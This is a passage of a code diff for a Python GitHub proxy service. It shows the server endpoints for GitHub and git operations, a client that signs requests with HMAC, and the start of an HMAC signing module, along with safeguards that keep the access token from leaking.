prs = await github.list_closing_pull_requests(repo, number)
|
||||
except GitHubError as exc:
|
||||
return _gh_error_response(exc)
|
||||
return JSONResponse({"pr_numbers": list(prs)})
|
||||
|
||||
@app.get("/gh/v1/pull_request")
|
||||
async def get_pull_request(request: Request, repo: str, number: int) -> JSONResponse:
|
||||
await _authenticate(request)
|
||||
github: GitHubClient = request.app.state.github
|
||||
try:
|
||||
info = await github.get_pull_request(repo, number)
|
||||
except GitHubError as exc:
|
||||
return _gh_error_response(exc)
|
||||
return JSONResponse(_serialize(info))
|
||||
|
||||
@app.get("/gh/v1/issues")
|
||||
async def list_issues(request: Request, repo: str, state: str = "open", limit: int = 30) -> JSONResponse:
|
||||
await _authenticate(request)
|
||||
github: GitHubClient = request.app.state.github
|
||||
try:
|
||||
items = await github.list_issues(repo, state=state, limit=limit)
|
||||
except GitHubError as exc:
|
||||
return _gh_error_response(exc)
|
||||
return JSONResponse({"items": [_serialize(s) for s in items]})
|
||||
|
||||
@app.get("/gh/v1/comments")
|
||||
async def list_comments(request: Request, repo: str, number: int) -> JSONResponse:
|
||||
await _authenticate(request)
|
||||
github: GitHubClient = request.app.state.github
|
||||
try:
|
||||
items = await github.list_comments(repo, number)
|
||||
except GitHubError as exc:
|
||||
return _gh_error_response(exc)
|
||||
return JSONResponse({"items": [_serialize(c) for c in items]})
|
||||
|
||||
@app.get("/gh/v1/review_comments")
|
||||
async def list_review_comments(request: Request, repo: str, pr_number: int) -> JSONResponse:
|
||||
await _authenticate(request)
|
||||
github: GitHubClient = request.app.state.github
|
||||
try:
|
||||
items = await github.list_review_comments(repo, pr_number)
|
||||
except GitHubError as exc:
|
||||
return _gh_error_response(exc)
|
||||
return JSONResponse({"items": [_serialize(c) for c in items]})
|
||||
|
||||
@app.get("/gh/v1/pr_reviews")
|
||||
async def list_pr_reviews(request: Request, repo: str, pr_number: int) -> JSONResponse:
|
||||
await _authenticate(request)
|
||||
github: GitHubClient = request.app.state.github
|
||||
try:
|
||||
items = await github.list_pr_reviews(repo, pr_number)
|
||||
except GitHubError as exc:
|
||||
return _gh_error_response(exc)
|
||||
return JSONResponse({"items": [_serialize(r) for r in items]})
|
||||
|
||||
# ---- writes ----
|
||||
async def _json_body(request: Request) -> dict[str, Any]:
|
||||
await _authenticate(request)
|
||||
try:
|
||||
data = await request.json()
|
||||
except Exception as exc:
|
||||
raise HTTPException(400, f"invalid json: {exc}") from exc
|
||||
if not isinstance(data, dict):
|
||||
raise HTTPException(400, "json body must be an object")
|
||||
return data
|
||||
|
||||
@app.post("/gh/v1/post_comment")
|
||||
async def post_comment(request: Request) -> JSONResponse:
|
||||
data = await _json_body(request)
|
||||
repo = _require_str(data.get("repo"), "repo")
|
||||
number = _require_int(data.get("number"), "number")
|
||||
body = _require_str(data.get("body"), "body")
|
||||
github: GitHubClient = request.app.state.github
|
||||
try:
|
||||
info = await github.post_comment(repo, number, body)
|
||||
except GitHubError as exc:
|
||||
return _gh_error_response(exc)
|
||||
return JSONResponse(_serialize(info))
|
||||
|
||||
@app.post("/gh/v1/open_pull_request")
|
||||
async def open_pull_request(request: Request) -> JSONResponse:
|
||||
data = await _json_body(request)
|
||||
repo = _require_str(data.get("repo"), "repo")
|
||||
head = _require_str(data.get("head"), "head")
|
||||
base = _require_str(data.get("base"), "base")
|
||||
title = _require_str(data.get("title"), "title")
|
||||
body = _require_str(data.get("body"), "body")
|
||||
draft = bool(data.get("draft", False))
|
||||
mcm = bool(data.get("maintainer_can_modify", True))
|
||||
github: GitHubClient = request.app.state.github
|
||||
try:
|
||||
pr = await github.open_pull_request(
|
||||
repo=repo,
|
||||
head=head,
|
||||
base=base,
|
||||
title=title,
|
||||
body=body,
|
||||
draft=draft,
|
||||
maintainer_can_modify=mcm,
|
||||
)
|
||||
except GitHubError as exc:
|
||||
return _gh_error_response(exc)
|
||||
return JSONResponse(_serialize(pr))
|
||||
|
||||
@app.post("/gh/v1/request_reviewers")
|
||||
async def request_reviewers(request: Request) -> JSONResponse:
|
||||
data = await _json_body(request)
|
||||
repo = _require_str(data.get("repo"), "repo")
|
||||
pr_number = _require_int(data.get("pr_number"), "pr_number")
|
||||
reviewers = _optional_str_list(data.get("reviewers"), "reviewers")
|
||||
team_reviewers = _optional_str_list(data.get("team_reviewers"), "team_reviewers")
|
||||
github: GitHubClient = request.app.state.github
|
||||
try:
|
||||
await github.request_reviewers(
|
||||
repo=repo,
|
||||
pr_number=pr_number,
|
||||
reviewers=reviewers,
|
||||
team_reviewers=team_reviewers,
|
||||
)
|
||||
except GitHubError as exc:
|
||||
return _gh_error_response(exc)
|
||||
return JSONResponse({"ok": True})
|
||||
|
||||
@app.post("/gh/v1/add_issue_labels")
|
||||
async def add_issue_labels(request: Request) -> JSONResponse:
|
||||
data = await _json_body(request)
|
||||
repo = _require_str(data.get("repo"), "repo")
|
||||
number = _require_int(data.get("number"), "number")
|
||||
labels = _optional_str_list(data.get("labels"), "labels") or []
|
||||
github: GitHubClient = request.app.state.github
|
||||
try:
|
||||
applied = await github.add_issue_labels(repo, number, labels)
|
||||
except GitHubError as exc:
|
||||
return _gh_error_response(exc)
|
||||
return JSONResponse({"labels": list(applied)})
|
||||
|
||||
@app.post("/gh/v1/add_assignees")
|
||||
async def add_assignees(request: Request) -> JSONResponse:
|
||||
data = await _json_body(request)
|
||||
repo = _require_str(data.get("repo"), "repo")
|
||||
number = _require_int(data.get("number"), "number")
|
||||
assignees = _optional_str_list(data.get("assignees"), "assignees") or []
|
||||
github: GitHubClient = request.app.state.github
|
||||
try:
|
||||
await github.add_assignees(repo, number, assignees)
|
||||
except GitHubError as exc:
|
||||
return _gh_error_response(exc)
|
||||
return JSONResponse({"ok": True})
|
||||
|
||||
@app.get("/gh/v1/comment_reactions")
|
||||
async def list_comment_reactions(request: Request, repo: str, comment_id: int) -> JSONResponse:
|
||||
await _authenticate(request)
|
||||
github: GitHubClient = request.app.state.github
|
||||
try:
|
||||
reactions = await github.list_comment_reactions(repo, comment_id)
|
||||
except GitHubError as exc:
|
||||
return _gh_error_response(exc)
|
||||
return JSONResponse({"items": [_serialize(r) for r in reactions]})
|
||||
|
||||
@app.post("/gh/v1/close_issue")
|
||||
async def close_issue(request: Request) -> JSONResponse:
|
||||
data = await _json_body(request)
|
||||
repo = _require_str(data.get("repo"), "repo")
|
||||
number = _require_int(data.get("number"), "number")
|
||||
reason_raw = data.get("reason")
|
||||
reason = reason_raw if isinstance(reason_raw, str) and reason_raw else "completed"
|
||||
github: GitHubClient = request.app.state.github
|
||||
try:
|
||||
await github.close_issue(repo, number, reason=reason)
|
||||
except GitHubError as exc:
|
||||
return _gh_error_response(exc)
|
||||
return JSONResponse({"ok": True})
|
||||
|
||||
# ---- git transport ----
|
||||
#
|
||||
# The underlying `robomp.git_ops` primitives are blocking `subprocess.run`
|
||||
# calls. Running them directly from an `async def` handler pins the
|
||||
# event loop until the subprocess returns; a hung git would freeze the
|
||||
# whole proxy. We bridge with `asyncio.to_thread` (work on a threadpool
|
||||
# worker) wrapped in `asyncio.wait_for` (hard wall-clock cap, returns
|
||||
# 504 on timeout). The subprocess itself can outlive the timeout — a
|
||||
# proper subprocess.kill plumbing would have to live inside
|
||||
# `git_ops._run_git`; flagged for follow-up.
|
||||
|
||||
async def _run_git_op(fn, *args, **kwargs): # type: ignore[no-untyped-def]
|
||||
try:
|
||||
return await asyncio.wait_for(
|
||||
asyncio.to_thread(fn, *args, **kwargs),
|
||||
timeout=settings.gh_proxy_git_timeout_seconds,
|
||||
)
|
||||
except TimeoutError as exc:
|
||||
log.warning(
|
||||
"gh-proxy: git op exceeded timeout",
|
||||
extra={"op": fn.__name__, "timeout": settings.gh_proxy_git_timeout_seconds},
|
||||
)
|
||||
raise HTTPException(504, f"git {fn.__name__} timed out") from exc
|
||||
|
||||
@app.post("/gh/v1/git/clone")
|
||||
async def git_clone_endpoint(request: Request) -> JSONResponse:
|
||||
data = await _json_body(request)
|
||||
repo = _require_str(data.get("repo"), "repo")
|
||||
clone_url = _require_str(data.get("clone_url"), "clone_url")
|
||||
default_branch = _require_str(data.get("default_branch"), "default_branch")
|
||||
target = _pool_dir(settings, repo)
|
||||
try:
|
||||
await _run_git_op(
|
||||
git_clone,
|
||||
target,
|
||||
clone_url=clone_url,
|
||||
default_branch=default_branch,
|
||||
token=_resolve_token(settings),
|
||||
)
|
||||
except GitCommandError as exc:
|
||||
return _git_error_response(exc)
|
||||
return JSONResponse({"pool_dir": str(target)})
|
||||
|
||||
@app.post("/gh/v1/git/fetch")
|
||||
async def git_fetch_endpoint(request: Request) -> JSONResponse:
|
||||
data = await _json_body(request)
|
||||
repo = _require_str(data.get("repo"), "repo")
|
||||
target = _pool_dir(settings, repo)
|
||||
try:
|
||||
await _run_git_op(git_fetch_prune, target, token=_resolve_token(settings))
|
||||
except GitCommandError as exc:
|
||||
return _git_error_response(exc)
|
||||
return JSONResponse({"pool_dir": str(target)})
|
||||
|
||||
@app.post("/gh/v1/git/fetch_ref")
|
||||
async def git_fetch_ref_endpoint(request: Request) -> JSONResponse:
|
||||
data = await _json_body(request)
|
||||
repo = _require_str(data.get("repo"), "repo")
|
||||
ref = _require_str(data.get("ref"), "ref")
|
||||
target = _pool_dir(settings, repo)
|
||||
# fetch_ref is intentionally best-effort; never surfaces a 5xx.
|
||||
await _run_git_op(git_fetch_ref, target, ref, token=_resolve_token(settings))
|
||||
return JSONResponse({"pool_dir": str(target)})
|
||||
|
||||
@app.post("/gh/v1/git/push")
|
||||
async def git_push_endpoint(request: Request) -> JSONResponse:
|
||||
data = await _json_body(request)
|
||||
repo = _require_str(data.get("repo"), "repo")
|
||||
workspace_key = _require_str(data.get("workspace_key"), "workspace_key")
|
||||
branch = _require_str(data.get("branch"), "branch")
|
||||
expected_head = _require_str(data.get("expected_head"), "expected_head")
|
||||
slot_uid = _optional_slot_uid(data.get("slot_uid"))
|
||||
# Sanity-check workspace_key matches the repo claim.
|
||||
expected_prefix = repo.replace("/", "__") + "__"
|
||||
if not workspace_key.startswith(expected_prefix):
|
||||
raise HTTPException(400, "workspace_key does not match repo")
|
||||
repo_dir = _workspace_repo_dir(settings, workspace_key)
|
||||
if not repo_dir.is_dir():
|
||||
raise HTTPException(404, f"workspace not found: {workspace_key}")
|
||||
# Block attacker-controlled `origin` from being a PAT exfil channel.
|
||||
# MUST run BEFORE any subprocess that would inject the token header.
|
||||
await asyncio.to_thread(_assert_origin_safe_for_repo, repo_dir, repo, slot_uid)
|
||||
try:
|
||||
result = await _run_git_op(
|
||||
git_push,
|
||||
repo_dir,
|
||||
branch=branch,
|
||||
expected_head=expected_head,
|
||||
token=_resolve_token(settings),
|
||||
slot_uid=slot_uid,
|
||||
)
|
||||
except HeadDriftError as exc:
|
||||
return _git_error_response(exc, head_drift=True)
|
||||
except GitCommandError as exc:
|
||||
return _git_error_response(exc)
|
||||
return JSONResponse({"head": result.head, "branch": result.branch})
|
||||
|
||||
# Expose for tests
|
||||
app.state.workspace_key_fn = compute_workspace_key # type: ignore[attr-defined]
|
||||
return app
|
||||
|
||||
|
||||
__all__ = ["create_proxy_app"]
|
||||
@@ -0,0 +1,495 @@
|
||||
"""Client half of the roboomp ↔ gh-proxy channel.
|
||||
|
||||
`GitHubProxyClient` implements `GitHubBackend` by HMAC-signing each request
|
||||
and forwarding to gh-proxy. `ProxyGitTransport` implements `GitTransport` by
|
||||
routing clone/fetch/push through the proxy too — roboomp never holds the PAT.
|
||||
|
||||
Both classes share an `httpx.AsyncClient` + `httpx.Client` against the proxy.
|
||||
Tests can inject a custom transport (`httpx.MockTransport` or `ASGITransport`)
|
||||
to short-circuit the network.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
import logging
|
||||
from collections.abc import Mapping
|
||||
from pathlib import Path
|
||||
from typing import Any
|
||||
|
||||
import httpx
|
||||
|
||||
from robomp.git_ops import GitCommandError, HeadDriftError, PushResult
|
||||
from robomp.github_client import (
|
||||
CommentInfo,
|
||||
GitHubError,
|
||||
IssueInfo,
|
||||
IssueSummary,
|
||||
PullRequestInfo,
|
||||
PullRequestReviewInfo,
|
||||
ReactionInfo,
|
||||
RepoInfo,
|
||||
ReviewCommentInfo,
|
||||
)
|
||||
from robomp.proxy_hmac import HEADER_SIGNATURE, HEADER_TIMESTAMP, sign
|
||||
|
||||
log = logging.getLogger(__name__)
|
||||
|
||||
|
||||
# ---------- error decoding ----------
|
||||
|
||||
|
||||
def _decode_error(resp: httpx.Response) -> Exception:
|
||||
"""Map a non-2xx response from gh-proxy back to a domain exception.
|
||||
|
||||
Proxy errors wrap the GitHub or git failure in `{"error": {...}}`.
|
||||
Anything else is collapsed to a generic GitHubError-shaped exception
|
||||
so callers see a consistent surface.
|
||||
"""
|
||||
body: Any
|
||||
try:
|
||||
body = resp.json()
|
||||
except Exception:
|
||||
body = None
|
||||
if isinstance(body, dict) and isinstance(body.get("error"), dict):
|
||||
err = body["error"]
|
||||
kind = err.get("kind")
|
||||
if kind == "github":
|
||||
return GitHubError(
|
||||
int(err.get("status") or resp.status_code),
|
||||
str(err.get("message") or "github error"),
|
||||
retry_after=err.get("retry_after"),
|
||||
)
|
||||
if kind in ("git", "head_drift"):
|
||||
cmd = err.get("cmd") or ["git"]
|
||||
stdout = str(err.get("stdout") or "")
|
||||
stderr = str(err.get("stderr") or "")
|
||||
returncode = int(err.get("returncode") or 1)
|
||||
klass = HeadDriftError if kind == "head_drift" else GitCommandError
|
||||
return klass(list(cmd), returncode, stdout, stderr)
|
||||
return GitHubError(resp.status_code, resp.text or "proxy error")
|
||||
|
||||
|
||||
# ---------- signing helpers ----------
|
||||
|
||||
|
||||
def _signed_headers(method: str, target: str, body: bytes, key: bytes) -> dict[str, str]:
|
||||
"""Return signing headers for an already-canonicalized request target.
|
||||
|
||||
`target` is `path` for query-less requests and `path?query` for GETs
|
||||
that carry parameters. It MUST byte-for-byte match the server-side
|
||||
`_request_target(request)` so HMAC verification succeeds — that's why
|
||||
the async path below builds an `httpx.Request` first and reads the
|
||||
encoded URL back out rather than re-encoding params here.
|
||||
"""
|
||||
ts, sig = sign(method=method, path=target, body=body, key=key)
|
||||
return {HEADER_TIMESTAMP: ts, HEADER_SIGNATURE: sig}
|
||||
|
||||
|
||||
# ---------- GitHubProxyClient ----------
|
||||
|
||||
|
||||
class GitHubProxyClient:
|
||||
"""HMAC-signed REST client speaking to a `robomp.proxy.server` instance.
|
||||
|
||||
Implements `GitHubBackend` (duck-typed). Returns the same typed
|
||||
dataclasses as the in-process `GitHubClient`, so call sites in worker,
|
||||
tasks, host_tools, server, and CLI work unchanged.
|
||||
"""
|
||||
|
||||
def __init__(
|
||||
self,
|
||||
*,
|
||||
base_url: str,
|
||||
hmac_key: str | bytes,
|
||||
transport: httpx.BaseTransport | httpx.AsyncBaseTransport | None = None,
|
||||
timeout: float = 30.0,
|
||||
) -> None:
|
||||
self._base_url = base_url.rstrip("/")
|
||||
self._key = hmac_key.encode("utf-8") if isinstance(hmac_key, str) else hmac_key
|
||||
self._transport = transport
|
||||
self._timeout = httpx.Timeout(timeout, connect=10.0)
|
||||
|
||||
def _async_client(self) -> httpx.AsyncClient:
|
||||
return httpx.AsyncClient(
|
||||
base_url=self._base_url,
|
||||
transport=self._transport, # type: ignore[arg-type]
|
||||
timeout=self._timeout,
|
||||
)
|
||||
|
||||
async def _request(
|
||||
self,
|
||||
method: str,
|
||||
path: str,
|
||||
*,
|
||||
params: Mapping[str, Any] | None = None,
|
||||
json_body: Mapping[str, Any] | None = None,
|
||||
) -> Any:
|
||||
body_bytes = b"" if json_body is None else json.dumps(json_body).encode("utf-8")
|
||||
async with self._async_client() as client:
|
||||
# Build the request first so httpx canonicalizes the URL once;
|
||||
# we then sign against the encoded query string the wire will
|
||||
# carry. Signing before this point would mean re-implementing
|
||||
# httpx's param encoding, with a high risk of byte-level drift
|
||||
# from the server's `request.url.query`.
|
||||
req = client.build_request(
|
||||
method,
|
||||
path,
|
||||
params=params,
|
||||
content=body_bytes if json_body is not None else None,
|
||||
)
|
||||
target = req.url.path
|
||||
if req.url.query:
|
||||
target = f"{target}?{req.url.query.decode('ascii')}"
|
||||
req.headers.update(_signed_headers(method, target, body_bytes, self._key))
|
||||
if json_body is not None:
|
||||
req.headers["Content-Type"] = "application/json"
|
||||
resp = await client.send(req)
|
||||
if resp.status_code >= 400:
|
||||
raise _decode_error(resp)
|
||||
if resp.status_code == 204 or not resp.content:
|
||||
return None
|
||||
return resp.json()
|
||||
|
||||
# ---- reads ----
|
||||
async def get_repo(self, repo: str) -> RepoInfo:
|
||||
data = await self._request("GET", "/gh/v1/repo", params={"repo": repo})
|
||||
return _repo_from(data)
|
||||
|
||||
async def get_issue(self, repo: str, number: int) -> IssueInfo:
|
||||
data = await self._request("GET", "/gh/v1/issue", params={"repo": repo, "number": number})
|
||||
return _issue_from(data)
|
||||
|
||||
async def list_closing_pull_requests(self, repo: str, number: int) -> tuple[int, ...]:
|
||||
data = await self._request("GET", "/gh/v1/closing_prs", params={"repo": repo, "number": number})
|
||||
items = data.get("pr_numbers") if isinstance(data, dict) else None
|
||||
return tuple(int(n) for n in items or () if isinstance(n, int))
|
||||
|
||||
async def get_pull_request(self, repo: str, number: int) -> PullRequestInfo:
|
||||
data = await self._request("GET", "/gh/v1/pull_request", params={"repo": repo, "number": number})
|
||||
return _pr_from(data)
|
||||
|
||||
async def list_issues(
|
||||
self,
|
||||
repo: str,
|
||||
*,
|
||||
state: str = "open",
|
||||
limit: int = 30,
|
||||
) -> list[IssueSummary]:
|
||||
data = await self._request(
|
||||
"GET",
|
||||
"/gh/v1/issues",
|
||||
params={"repo": repo, "state": state, "limit": limit},
|
||||
)
|
||||
return [_issue_summary_from(item) for item in (data.get("items") if isinstance(data, dict) else None) or []]
|
||||
|
||||
async def list_comments(self, repo: str, number: int) -> list[CommentInfo]:
|
||||
data = await self._request("GET", "/gh/v1/comments", params={"repo": repo, "number": number})
|
||||
return [_comment_from(item) for item in (data.get("items") if isinstance(data, dict) else None) or []]
|
||||
|
||||
async def list_review_comments(self, repo: str, pr_number: int) -> list[ReviewCommentInfo]:
|
||||
data = await self._request(
|
||||
"GET",
|
||||
"/gh/v1/review_comments",
|
||||
params={"repo": repo, "pr_number": pr_number},
|
||||
)
|
||||
return [_review_comment_from(item) for item in (data.get("items") if isinstance(data, dict) else None) or []]
|
||||
|
||||
async def list_pr_reviews(self, repo: str, pr_number: int) -> list[PullRequestReviewInfo]:
|
||||
data = await self._request(
|
||||
"GET",
|
||||
"/gh/v1/pr_reviews",
|
||||
params={"repo": repo, "pr_number": pr_number},
|
||||
)
|
||||
return [_pr_review_from(item) for item in (data.get("items") if isinstance(data, dict) else None) or []]
|
||||
|
||||
async def get_authenticated_login(self) -> str:
|
||||
data = await self._request("GET", "/gh/v1/authenticated_login")
|
||||
return str(data["login"]) if isinstance(data, dict) else ""
|
||||
|
||||
# ---- writes ----
|
||||
async def post_comment(self, repo: str, number: int, body: str) -> CommentInfo:
|
||||
data = await self._request(
|
||||
"POST",
|
||||
"/gh/v1/post_comment",
|
||||
json_body={"repo": repo, "number": number, "body": body},
|
||||
)
|
||||
return _comment_from(data)
|
||||
|
||||
async def open_pull_request(
|
||||
self,
|
||||
*,
|
||||
repo: str,
|
||||
head: str,
|
||||
base: str,
|
||||
title: str,
|
||||
body: str,
|
||||
draft: bool = False,
|
||||
maintainer_can_modify: bool = True,
|
||||
) -> PullRequestInfo:
|
||||
data = await self._request(
|
||||
"POST",
|
||||
"/gh/v1/open_pull_request",
|
||||
json_body={
|
||||
"repo": repo,
|
||||
"head": head,
|
||||
"base": base,
|
||||
"title": title,
|
||||
"body": body,
|
||||
"draft": draft,
|
||||
"maintainer_can_modify": maintainer_can_modify,
|
||||
},
|
||||
)
|
||||
return _pr_from(data)
|
||||
|
||||
async def request_reviewers(
|
||||
self,
|
||||
*,
|
||||
repo: str,
|
||||
pr_number: int,
|
||||
reviewers: list[str] | None = None,
|
||||
team_reviewers: list[str] | None = None,
|
||||
) -> None:
|
||||
if not reviewers and not team_reviewers:
|
||||
return
|
||||
await self._request(
|
||||
"POST",
|
||||
"/gh/v1/request_reviewers",
|
||||
json_body={
|
||||
"repo": repo,
|
||||
"pr_number": pr_number,
|
||||
"reviewers": reviewers,
|
||||
"team_reviewers": team_reviewers,
|
||||
},
|
||||
)
|
||||
|
||||
async def add_issue_labels(self, repo: str, number: int, labels: list[str]) -> tuple[str, ...]:
|
||||
if not labels:
|
||||
return ()
|
||||
data = await self._request(
|
||||
"POST",
|
||||
"/gh/v1/add_issue_labels",
|
||||
json_body={"repo": repo, "number": number, "labels": labels},
|
||||
)
|
||||
return tuple(str(lbl) for lbl in (data.get("labels") if isinstance(data, dict) else None) or [])
|
||||
|
||||
async def add_assignees(self, repo: str, number: int, assignees: list[str]) -> None:
|
||||
if not assignees:
|
||||
return
|
||||
await self._request(
|
||||
"POST",
|
||||
"/gh/v1/add_assignees",
|
||||
json_body={"repo": repo, "number": number, "assignees": assignees},
|
||||
)
|
||||
|
||||
async def list_comment_reactions(self, repo: str, comment_id: int) -> tuple[ReactionInfo, ...]:
|
||||
data = await self._request(
|
||||
"GET",
|
||||
"/gh/v1/comment_reactions",
|
||||
params={"repo": repo, "comment_id": comment_id},
|
||||
)
|
||||
items = data.get("items") if isinstance(data, dict) else None
|
||||
return tuple(_reaction_from(item) for item in items or ())
|
||||
|
||||
async def close_issue(self, repo: str, number: int, *, reason: str = "completed") -> None:
|
||||
await self._request(
|
||||
"POST",
|
||||
"/gh/v1/close_issue",
|
||||
json_body={"repo": repo, "number": number, "reason": reason},
|
||||
)
|
||||
|
||||
|
||||
# ---------- ProxyGitTransport ----------
|
||||
|
||||
|
||||
class ProxyGitTransport:
|
||||
"""Routes clone/fetch/push to gh-proxy over the same HMAC channel.
|
||||
|
||||
Uses a synchronous httpx client because the SandboxManager call sites
|
||||
are synchronous; the proxy itself is asynchronous internally but we
|
||||
bridge with a one-shot sync request per call.
|
||||
"""
|
||||
|
||||
__slots__ = ("_base_url", "_key", "_transport", "_timeout")
|
||||
|
||||
def __init__(
|
||||
self,
|
||||
*,
|
||||
base_url: str,
|
||||
hmac_key: str | bytes,
|
||||
transport: httpx.BaseTransport | None = None,
|
||||
timeout: float = 120.0,
|
||||
) -> None:
|
||||
self._base_url = base_url.rstrip("/")
|
||||
self._key = hmac_key.encode("utf-8") if isinstance(hmac_key, str) else hmac_key
|
||||
self._transport = transport
|
||||
self._timeout = httpx.Timeout(timeout, connect=10.0)
|
||||
|
||||
def _client(self) -> httpx.Client:
|
||||
return httpx.Client(
|
||||
base_url=self._base_url,
|
||||
transport=self._transport,
|
||||
timeout=self._timeout,
|
||||
)
|
||||
|
||||
def _post(self, path: str, body: Mapping[str, Any]) -> Mapping[str, Any]:
|
||||
body_bytes = json.dumps(body).encode("utf-8")
|
||||
headers = _signed_headers("POST", path, body_bytes, self._key)
|
||||
headers["Content-Type"] = "application/json"
|
||||
with self._client() as client:
|
||||
resp = client.request("POST", path, content=body_bytes, headers=headers)
|
||||
if resp.status_code >= 400:
|
||||
raise _decode_error(resp)
|
||||
if resp.status_code == 204 or not resp.content:
|
||||
return {}
|
||||
data = resp.json()
|
||||
return data if isinstance(data, dict) else {}
|
||||
|
||||
def clone_pool(self, *, repo: str, clone_url: str, default_branch: str, target: Path) -> None:
|
||||
del target # remote-resolved on the proxy side from `repo`
|
||||
self._post(
|
||||
"/gh/v1/git/clone",
|
||||
{"repo": repo, "clone_url": clone_url, "default_branch": default_branch},
|
||||
)
|
||||
|
||||
def fetch_pool(self, *, repo: str, pool_dir: Path) -> None:
|
||||
del pool_dir
|
||||
self._post("/gh/v1/git/fetch", {"repo": repo})
|
||||
|
||||
def fetch_base_ref(self, *, repo: str, pool_dir: Path, ref: str) -> None:
|
||||
del pool_dir
|
||||
self._post("/gh/v1/git/fetch_ref", {"repo": repo, "ref": ref})
|
||||
|
||||
def push_branch(
|
||||
self,
|
||||
*,
|
||||
repo: str,
|
||||
workspace_key: str,
|
||||
repo_dir: Path,
|
||||
branch: str,
|
||||
expected_head: str,
|
||||
slot_uid: int | None = None,
|
||||
) -> PushResult:
|
||||
del repo_dir
|
||||
body: dict[str, Any] = {
|
||||
"repo": repo,
|
||||
"workspace_key": workspace_key,
|
||||
"branch": branch,
|
||||
"expected_head": expected_head,
|
||||
}
|
||||
if slot_uid is not None:
|
||||
body["slot_uid"] = slot_uid
|
||||
data = self._post("/gh/v1/git/push", body)
|
||||
return PushResult(head=str(data.get("head") or expected_head), branch=str(data.get("branch") or branch))
|
||||
|
||||
|
||||
# ---------- payload helpers ----------
|
||||
|
||||
|
||||
def _repo_from(data: Any) -> RepoInfo:
|
||||
if not isinstance(data, dict):
|
||||
raise GitHubError(500, "proxy returned malformed repo payload")
|
||||
return RepoInfo(
|
||||
full_name=str(data["full_name"]),
|
||||
default_branch=str(data["default_branch"]),
|
||||
clone_url=str(data["clone_url"]),
|
||||
private=bool(data.get("private", False)),
|
||||
)
|
||||
|
||||
|
||||
def _issue_from(data: Any) -> IssueInfo:
|
||||
if not isinstance(data, dict):
|
||||
raise GitHubError(500, "proxy returned malformed issue payload")
|
||||
labels = data.get("labels") or []
|
||||
return IssueInfo(
|
||||
repo=str(data["repo"]),
|
||||
number=int(data["number"]),
|
||||
title=str(data.get("title") or ""),
|
||||
body=str(data.get("body") or ""),
|
||||
state=str(data.get("state") or "open"),
|
||||
author=str(data.get("author") or ""),
|
||||
labels=tuple(str(x) for x in labels),
|
||||
is_pull_request=bool(data.get("is_pull_request", False)),
|
||||
)
|
||||
|
||||
|
||||
def _issue_summary_from(data: Any) -> IssueSummary:
|
||||
if not isinstance(data, dict):
|
||||
raise GitHubError(500, "proxy returned malformed issue summary payload")
|
||||
return IssueSummary(
|
||||
repo=str(data["repo"]),
|
||||
number=int(data["number"]),
|
||||
title=str(data.get("title") or ""),
|
||||
state=str(data.get("state") or ""),
|
||||
author=str(data.get("author") or ""),
|
||||
labels=tuple(str(x) for x in (data.get("labels") or [])),
|
||||
comments=int(data.get("comments") or 0),
|
||||
updated_at=str(data.get("updated_at") or ""),
|
||||
created_at=str(data.get("created_at") or ""),
|
||||
html_url=str(data.get("html_url") or ""),
|
||||
)
|
||||
|
||||
|
||||
def _comment_from(data: Any) -> CommentInfo:
|
||||
if not isinstance(data, dict):
|
||||
raise GitHubError(500, "proxy returned malformed comment payload")
|
||||
return CommentInfo(
|
||||
id=int(data["id"]),
|
||||
author=str(data.get("author") or ""),
|
||||
body=str(data.get("body") or ""),
|
||||
created_at=str(data.get("created_at") or ""),
|
||||
)
|
||||
|
||||
|
||||
def _reaction_from(data: Any) -> ReactionInfo:
|
||||
if not isinstance(data, dict):
|
||||
raise GitHubError(500, "proxy returned malformed reaction payload")
|
||||
return ReactionInfo(
|
||||
content=str(data.get("content") or ""),
|
||||
user_login=str(data.get("user_login") or ""),
|
||||
user_type=str(data.get("user_type") or ""),
|
||||
)
|
||||
|
||||
|
||||
def _review_comment_from(data: Any) -> ReviewCommentInfo:
|
||||
if not isinstance(data, dict):
|
||||
raise GitHubError(500, "proxy returned malformed review_comment payload")
|
||||
line = data.get("line")
|
||||
return ReviewCommentInfo(
|
||||
id=int(data.get("id") or 0),
|
||||
author=str(data.get("author") or ""),
|
||||
body=str(data.get("body") or ""),
|
||||
path=str(data.get("path") or ""),
|
||||
line=line if isinstance(line, int) else None,
|
||||
created_at=str(data.get("created_at") or ""),
|
||||
)
|
||||
|
||||
|
||||
def _pr_review_from(data: Any) -> PullRequestReviewInfo:
|
||||
if not isinstance(data, dict):
|
||||
raise GitHubError(500, "proxy returned malformed pr_review payload")
|
||||
return PullRequestReviewInfo(
|
||||
id=int(data.get("id") or 0),
|
||||
author=str(data.get("author") or ""),
|
||||
body=str(data.get("body") or ""),
|
||||
state=str(data.get("state") or ""),
|
||||
submitted_at=str(data.get("submitted_at") or ""),
|
||||
)
|
||||
|
||||
|
||||
def _pr_from(data: Any) -> PullRequestInfo:
|
||||
if not isinstance(data, dict):
|
||||
raise GitHubError(500, "proxy returned malformed pr payload")
|
||||
return PullRequestInfo(
|
||||
repo=str(data["repo"]),
|
||||
number=int(data["number"]),
|
||||
html_url=str(data["html_url"]),
|
||||
head_ref=str(data.get("head_ref") or ""),
|
||||
base_ref=str(data.get("base_ref") or ""),
|
||||
state=str(data.get("state") or "open"),
|
||||
author=str(data.get("author") or ""),
|
||||
head_repo=str(data.get("head_repo") or ""),
|
||||
)
|
||||
|
||||
|
||||
__all__ = ["GitHubProxyClient", "ProxyGitTransport"]
|
||||
@@ -0,0 +1,98 @@
|
||||
"""Shared HMAC signing/verification for the roboomp ↔ gh-proxy channel.
|
||||
|
||||
Roboomp signs every request to gh-proxy with an HMAC-SHA256 over
|
||||
`(method, path, timestamp, sha256(body))`. The shared secret never leaves
|
||||
either container's memory, and the ±skew window bounds the replay surface.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import hashlib
|
||||
import hmac
|
||||
import time
|
||||
from typing import NamedTuple
|
||||
|
||||
# Headers on every roboomp→gh-proxy request.
|
||||
HEADER_TIMESTAMP = "X-Robomp-Timestamp" # unix seconds, integer string
|
||||
HEADER_SIGNATURE = "X-Robomp-Sig" # hex-encoded HMAC-SHA256
|
||||
|
||||
# ±skew permits modest clock drift while keeping the replay window small.
|
||||
DEFAULT_SKEW_SECONDS = 30
|
||||
|
||||
|
||||
def _string_to_sign(method: str, path: str, timestamp: str, body: bytes) -> bytes:
|
||||
return b"\n".join(
|
||||
(
|
||||
method.upper().encode("ascii"),
|
||||
path.encode("utf-8"),
|
||||
timestamp.encode("ascii"),
